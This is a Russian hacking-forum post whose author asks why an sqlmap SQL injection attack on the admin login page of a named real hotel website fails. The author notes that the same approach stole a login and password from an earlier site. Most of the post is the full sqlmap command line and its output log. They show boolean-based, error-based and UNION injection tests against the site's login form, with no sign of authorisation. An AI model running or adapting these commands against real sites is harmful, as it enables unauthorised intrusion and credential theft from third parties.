Форум АНТИЧАТ - Показать сообщение отдельно - Ваши вопросы по уязвимостям.

Почему на другую версию движка запрос типа

Код:

Code:
"-u "www.bogema-hotel.ru/access_admin.php" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"

записает на идеинтичном запросе?

В прошлый раз на прошлом сайте получилось выдернуть логин и пароль, а тут блок какой-то..

Код:

Code:
"
sqlmap.py -u "http://www.bogema-hotel.ru" --eta --random-agent
--threads=8   --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --curr
ent-db  --column --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
         _
___ ___| |_____ ___ ___  {1.0-dev-nongit-20150622}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:24:53

[15:24:53] [INFO] fetched random HTTP User-Agent header from file '
indows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.140
19 Firefox/3.6.13'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q] n
[15:24:56] [INFO] testing connection to the target URL
[15:24:56] [INFO] heuristics detected web page charset 'windows-1251'
[15:24:56] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[15:24:57] [INFO] target URL is stable
[15:24:57] [INFO] testing if POST parameter 'auth_login' is dynamic
[15:24:57] [WARNING] POST parameter 'auth_login' does not appear dynamic
[15:24:58] [WARNING] heuristic (basic) test shows that POST parameter 'auth_logi
n' might not be injectable
[15:24:58] [INFO] testing for SQL injection on POST parameter 'auth_login'
[15:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[15:26:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[15:26:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
R BY or GROUP BY clause'
[15:27:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (MAKE_SET)'
[15:27:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (ELT)'
[15:28:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (bool*int)'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'

[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[15:28:44] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY
clause'
[15:28:49] [WARNING] reflective value(s) found and filtering out
[15:28:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
clause (original value)'
[15:28:51] [INFO] testing 'MySQL = 5.0 boolean-based blind - Stacked queries'
[15:29:25] [INFO] testing 'MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[15:30:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[15:30:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[15:30:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[15:30:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[15:30:52] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[15:30:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[15:30:53] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'

[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(EXTRACTVALUE)'
[15:30:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(UPDATEXML)'
[15:30:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
(BIGINT UNSIGNED)'
[15:30:54] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'

[15:30:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 66 columns (custom)
'"